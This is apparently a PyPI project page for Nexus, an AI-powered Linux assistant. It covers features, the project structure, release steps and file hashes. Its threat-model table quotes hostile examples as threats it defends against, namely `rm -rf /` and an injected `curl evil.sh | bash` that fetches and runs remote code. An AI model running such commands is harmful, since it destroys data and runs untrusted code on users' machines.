SERVICE_MGT Action: A dedicated step type for service management (systemctl start/restart) that automatically runs systemctl is-active after execution to confirm the service is actually up before marking the step as success.

Smart Download Tracking

Monitors ~/Downloads for new files
Filters out .crdownload, .part, .tmp
Injects filenames into subsequent commands

Security

Threat Model — What Nexus Defends Against

Attack Surface	Threat	Defence
LLM-generated commands	AI hallucinates a destructive command (`rm -rf /`)	AST parser + blacklist hard-blocks it before any execution
Shell injection	Crafted input turns a simple command into `cmd; curl evil.sh \| bash`	`shell=True` only enabled when genuine pipeline operators detected; otherwise `shlex.split()` list is used
Sudo privilege abuse	Cached password reused across untrusted commands	Password stored as `bytearray`, zeroed byte-by-byte on auth failure; never a plain Python string
Unseen command execution	Agent runs commands user never approved	Mandatory user confirmation gate on every execution; every decision logged to `~/.nexus/audit.log`
Audit evasion	Attacker covers tracks by deleting session data	Audit log is separate from session (`audit.log` vs `session.json`), `chmod 600`, append-only via Python logging
API key leakage	Keys logged in debug output or stack traces	No debug prints in production paths; keys read from env/config, never echoed
Path escape on file read/write	LLM points `FILE_READ` or CLI `read` at another user’s home via prefix tricks	`Path.resolve()` + `relative_to` allowlist (home + cwd), not `str.startswith` on `/home/user`
FTP secrets on CLI	Model suggests `ftp://user:pass@…` or `wget --ftp-password=`	Regex warnings in `CommandValidator`; strict validation blocks before execution
Indefinite hangs	Malformed command hangs the subprocess forever	Configurable timeout (default 120s) on all `subprocess.run` calls
Cascading API failures	All LLM fallbacks slammed simultaneously on rate-limit	Exponential backoff with jitter between fallback attempts

Remaining Attack Surface / Known Limitations

shell=True is still used for commands with pipeline operators — a sophisticated injected payload containing | could still bypass isolation. Mitigation: the AST validator and user confirmation gate remain the last line of defence.
sudo password is zeroed on auth failure, but a core dump between prompt and clear could expose it in memory. Mitigation: use a dedicated sudo session token (planned, P3).
Session file (~/.nexus/session.json) is unencrypted. On multi-user machines, ensure proper home directory permissions (700).

Configuration

# Enable dry-run (no commands ever executed)
export JARVIS_DRY_RUN=1

# Audit log location
~/.nexus/audit.log

# Session history location
~/.nexus/session.json

Project Structure

nexus/
├── src/jarvis/
│   ├── ai/                      # AI clients and intelligence
│   │   ├── llm_client.py        # Model abstractions + prompt enrichment
│   │   ├── command_generator.py  # NL → shell with SafetyCheck
│   │   ├── decision_engine.py   # Fast heuristic + slow LLM routing
│   │   └── memory_client.py     # Supermemory RAG integration
│   ├── core/                    # Core systems
│   │   ├── orchestrator.py      # Multi-step execution + self-healing
│   │   ├── executor.py          # Command execution + audit + secure sudo
│   │   ├── audit_logger.py      # Tamper-evident command log (chmod 600)
│   │   ├── session_manager.py   # In-memory session state
│   │   ├── persistent_session_manager.py  # Disk-persisted sessions
│   │   ├── config_manager.py    # API keys + preferences (chmod 600)
│   │   ├── model_catalog.py    # Task ↔ model catalog; apply saved defaults at startup
│   │   ├── api_key_rotator.py   # Google API key rotation
│   │   ├── system_detector.py
│   │   └── security.py          # AST validation + pattern blacklist
│   ├── modules/                 # Feature modules
│   │   ├── browser_manager.py   # browser-use + API key rotation
│   │   └── package_manager.py   # apt/dnf/pacman with name validation
│   ├── ui/                      # User interfaces
│   │   ├── console_app.py       # Rich TUI with slash commands
│   │   └── onboarding.py
│   ├── utils/
│   │   └── syntax_output.py     # Rich syntax highlighting for file reads
│   └── main.py                  # CLI entry point (Typer)
├── tests/                       # 198+ pytest tests
├── docs/
│   ├── FUTURE_SCOPE.md          # Roadmap + shipped features
│   ├── architecture_overview.md # Architecture deep-dive with Mermaid diagrams
│   ├── model_usage_guide.md     # Which AI model is used where
│   ├── API_KEY_ROTATION_GUIDE.md
│   ├── GROQ_GPT_FALLBACK.md
│   └── MEMORY_PERSISTENCE_GUIDE.md
├── .github/workflows/ci.yml    # CI: tests + lint + security scan
├── pyproject.toml
└── README.md

Environment Variables

Variable	Purpose	Required
`GOOGLE_API_KEY`	Gemini models, search	For search feature
`OPENROUTER_API_KEY`	GPT models via OpenRouter	For best chat quality
`GROQ_API_KEY`	Fast routing decisions	Optional (fallback to others)
`SUPERMEMORY_API_KEY`	Memory/RAG (your Supermemory project; BYOK)	Optional
`BROWSER_USE_API_KEY`	Cloud browser automation	Optional

Roadmap

See docs/FUTURE_SCOPE.md for the full roadmap.

Shipped: Multi-brain AI architecture, Supermemory RAG (BYOK onboarding + env), browser automation with key rotation, self-healing execution (improved missing-path heuristics, shared FILE_WRITE helpers), exponential backoff (planner) + command-generator retries/fallbacks (memory recorded on the succeeding LLM client), SERVICE_MGT, DIRECT_EXECUTE, /settings + onboarding default models (shared model_catalog), planner system-ops knowledge (AppImage w/ mktemp extract, deb, rpm, desktop entries), path allowlists for read/write, FTP strict checks, persistent sessions, audit logging, secure sudo, shell injection hardening, 198-test suite, CI with linting and security scanning.

Up next: Rollback checkpoints, dynamic slash command registry, FILE_APPEND / FILE_PATCH, LLM rate limiting & budgets, context window management, parallel step execution.

Long-term: MCP integration, Git assistant, Docker management mode, natural language cron jobs, interactive desktop avatar.

Releasing (maintainers)

Bump version in pyproject.toml if needed.
Create and push an annotated tag: git tag v0.1.0 && git push origin v0.1.0.
The .github/workflows/release.yml workflow builds sdist + wheel, uploads them to the GitHub Release, then publishes to PyPI via trusted publishing (OIDC).

One-time PyPI setup: On pypi.org, create the project nexus-linux-assistant, then add a trusted publisher for this GitHub repo (Garvit1000/nexus) and workflow release.yml (docs). No PYPI_TOKEN secret is required when OIDC is configured.

Build only from CI or a clean tree so .env is never included in artifacts.

Contributing

Contributions are welcome! This project is actively developed.

License

[Add your license here]

Author

Created by Garvit (garvitjoshi543@gmail.com)

Nexus - Your intelligent Linux companion, powered by multiple AI brains working in harmony.

Project details

These details have been verified by PyPI

Project links

GitHub Statistics

Maintainers

Garvit1000

These details have not been verified by PyPI

Release history Release notifications | RSS feed

0.1.2

Apr 5, 2026

0.1.1

Mar 29, 2026

This version

0.1.0

Mar 26, 2026

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

nexus_linux_assistant-0.1.0.tar.gz (138.7 kB view details)

Uploaded Mar 26, 2026 Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

The dropdown lists show the available interpreters, ABIs, and platforms. Enable javascript to be able to filter the list of wheel files.

nexus_linux_assistant-0.1.0-py3-none-any.whl (99.6 kB view details)

Uploaded Mar 26, 2026 Python 3

File details

Details for the file nexus_linux_assistant-0.1.0.tar.gz.

File metadata

Download URL: nexus_linux_assistant-0.1.0.tar.gz
Upload date: Mar 26, 2026
Size: 138.7 kB
Tags: Source
Uploaded using Trusted Publishing? Yes
Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for nexus_linux_assistant-0.1.0.tar.gz
Algorithm	Hash digest
SHA256	`da06b3ed9393ca10787f722ed90a96a3e49e042c741a4e28456383a8a4be1718`
MD5	`df1f90c7b1d9ca5f086b825733fd1774`
BLAKE2b-256	`cc54c4041b7e04376fde34ed1bf9ceeef98363e315cbc584bbf7a009cdb0f551`

See more details on using hashes here.

Provenance

The following attestation bundles were made for nexus_linux_assistant-0.1.0.tar.gz:

Publisher: release.yml on Garvit1000/nexus

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Statement:
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: nexus_linux_assistant-0.1.0.tar.gz
- Subject digest: da06b3ed9393ca10787f722ed90a96a3e49e042c741a4e28456383a8a4be1718
- Sigstore transparency entry: 1186194753
- Sigstore integration time: Mar 26, 2026
Source repository:
- Permalink: Garvit1000/nexus@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Branch / Tag: refs/tags/v0.1.0
- Owner: https://github.com/Garvit1000
- Access: private
Publication detail:
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: release.yml@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Trigger Event: push

File details

Details for the file nexus_linux_assistant-0.1.0-py3-none-any.whl.

File metadata

Download URL: nexus_linux_assistant-0.1.0-py3-none-any.whl
Upload date: Mar 26, 2026
Size: 99.6 kB
Tags: Python 3
Uploaded using Trusted Publishing? Yes
Uploaded via: twine/6.1.0 CPython/3.13.7

File hashes

Hashes for nexus_linux_assistant-0.1.0-py3-none-any.whl
Algorithm	Hash digest
SHA256	`9b06c674e9d6e6d5536d25c64d0a4e9dc750c200bb4ae94c0bf9352abd35a68e`
MD5	`c47d3bebede8e74fc89f8a2fac142bf2`
BLAKE2b-256	`4f3aa464a5562e2a6ceff98852d12e316ec52c02cfded6d855bbd509648d5149`

See more details on using hashes here.

Provenance

The following attestation bundles were made for nexus_linux_assistant-0.1.0-py3-none-any.whl:

Publisher: release.yml on Garvit1000/nexus

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Statement:
- Statement type: https://in-toto.io/Statement/v1
- Predicate type: https://docs.pypi.org/attestations/publish/v1
- Subject name: nexus_linux_assistant-0.1.0-py3-none-any.whl
- Subject digest: 9b06c674e9d6e6d5536d25c64d0a4e9dc750c200bb4ae94c0bf9352abd35a68e
- Sigstore transparency entry: 1186194757
- Sigstore integration time: Mar 26, 2026
Source repository:
- Permalink: Garvit1000/nexus@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Branch / Tag: refs/tags/v0.1.0
- Owner: https://github.com/Garvit1000
- Access: private
Publication detail:
- Token Issuer: https://token.actions.githubusercontent.com
- Runner Environment: github-hosted
- Publication workflow: release.yml@879a6bb5d37586a214a6cd898f764c89992c9fd1
- Trigger Event: push

nexus-linux-assistant 0.1.0

Navigation

Verified details

Project links

GitHub Statistics

Maintainers

Unverified details

Meta

Project description

Nexus - AI-Powered Linux Assistant

Key Features

Maturity snapshot (March 2026)

Architecture Overview

AI Model Usage Map

Model Priority & Auto-Failover System

System Flow Diagrams

1. User Input Processing Flow

2. Complex Task Orchestration Flow

3. Dual-Stage Self-Healing Execution Flow

3.5 Ephemeral Azure Sandboxing (AZURE_RUN)

True Capacity: The DevOps & Sysadmin Engine

4. Memory System Integration

Component Details

AI Clients (src/jarvis/ai/)

llm_client.py - LLM Abstraction Layer

command_generator.py - Natural Language → Shell Commands

decision_engine.py - Intent Classification

memory_client.py - Supermemory Integration

Core Systems (src/jarvis/core/)

orchestrator.py - Multi-Step Task Execution

executor.py & security.py — Safe Command Execution

config_manager.py - Configuration Management

system_detector.py - OS Detection

Modules (src/jarvis/modules/)

browser_manager.py - Web Automation

package_manager.py - System Package Management

UI Layer (src/jarvis/ui/)

console_app.py — Terminal User Interface

model_catalog.py — Shared task ↔ model catalog

onboarding.py - First-Run Setup

Onboarding & Supermemory (BYOK)

Installation

Install from PyPI (recommended)

Install from a GitHub Release tarball

Prerequisites

Setup

Global Access

Usage

Interactive Mode (TUI)

Settings and default models

CLI Commands

Chat

Package Management

Natural Language Execution

Browser Automation

Web Search

Testing

Test Coverage Map

tests/test_security.py — 32 tests

tests/test_audit_logger.py — 8 tests

tests/test_executor.py — 18 tests

tests/test_planner.py — 12 tests

tests/test_decision_engine.py — 13 tests

tests/test_config_manager.py — 13 tests

tests/test_model_catalog.py — 6 tests

tests/test_session_manager.py — 29 tests

tests/test_command_generator.py — 16 tests

tests/test_llm_client.py — 11 tests

tests/test_package_manager.py — 22 tests

tests/test_orchestrator.py — 24 tests

CI / Continuous Integration

Advanced Features

Memory System

Multi-Step Task Planning

Self-Healing & Fallback Execution

Smart Download Tracking

Security

Threat Model — What Nexus Defends Against

Remaining Attack Surface / Known Limitations

Configuration

3.5 Ephemeral Azure Sandboxing (`AZURE_RUN`)

AI Clients (`src/jarvis/ai/`)

`llm_client.py` - LLM Abstraction Layer

`command_generator.py` - Natural Language → Shell Commands

`decision_engine.py` - Intent Classification

`memory_client.py` - Supermemory Integration

Core Systems (`src/jarvis/core/`)

`orchestrator.py` - Multi-Step Task Execution

`executor.py` & `security.py` — Safe Command Execution

`config_manager.py` - Configuration Management

`system_detector.py` - OS Detection

Modules (`src/jarvis/modules/`)

`browser_manager.py` - Web Automation

`package_manager.py` - System Package Management

UI Layer (`src/jarvis/ui/`)

`console_app.py` — Terminal User Interface

`model_catalog.py` — Shared task ↔ model catalog

`onboarding.py` - First-Run Setup

`tests/test_security.py` — 32 tests

`tests/test_audit_logger.py` — 8 tests

`tests/test_executor.py` — 18 tests

`tests/test_planner.py` — 12 tests

`tests/test_decision_engine.py` — 13 tests

`tests/test_config_manager.py` — 13 tests

`tests/test_model_catalog.py` — 6 tests

`tests/test_session_manager.py` — 29 tests

`tests/test_command_generator.py` — 16 tests

`tests/test_llm_client.py` — 11 tests

`tests/test_package_manager.py` — 22 tests

`tests/test_orchestrator.py` — 24 tests